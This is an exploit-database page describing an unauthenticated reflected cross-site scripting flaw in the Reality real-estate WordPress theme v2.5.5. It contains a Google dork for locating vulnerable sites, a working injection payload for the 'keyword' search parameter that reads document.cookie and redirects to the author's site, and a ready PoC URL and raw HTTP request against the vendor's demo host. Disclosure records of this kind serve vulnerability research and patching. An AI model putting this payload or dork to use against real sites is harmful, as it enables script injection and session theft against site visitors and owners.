Advertisement






Reality | Estate Multipurpose WordPress Theme v2.5.5 - Unauthenticated Reflected XSS

CVE Category Price Severity
CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-07-18
CVSS EPSS EPSSP
No CVSS score provided for this exploit 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070099

Below is a copy:

Reality | Estate Multipurpose WordPress Theme v2.5.5 - Unauthenticated Reflected XSS
[+] Exploit Title: Reality | Estate Multipurpose WordPress Theme v2.5.5 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/reality/
[+] Date: 2020-07-15
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: InwaveThemes [ http://inwavethemes.com ]
[+] Software Version: 2.5.5
[+] Software Link: https://themeforest.net/item/reality-real-estate-wordpress-theme/21627776
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Reality theme through 2.5.5 for WordPress.



### [ Payload: ]

[$] " autofocus onfocus=alert(`VLDVCTOR`);alert(document.cookie);window.location=`https://vladvector.ru`; ">



### [ PoC: ]

[!] https://reality.inwavethemes.com/properties/?keyword=%22+autofocus+onfocus%3Dalert(`VL%CE%9BDV%CE%9ECTOR`)%3Balert(document.cookie)%3Bwindow.location%3D`https%3A%2F%2Fvladvector.ru`%3B+%22%3E

[!] GET /properties/?keyword=%22+autofocus+onfocus%3Dalert(`VL%CE%9BDV%CE%9ECTOR`)%3Balert(document.cookie)%3Bwindow.location%3D`https%3A%2F%2Fvladvector.ru`%3B+%22%3E HTTP/1.1
Host: reality.inwavethemes.com



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum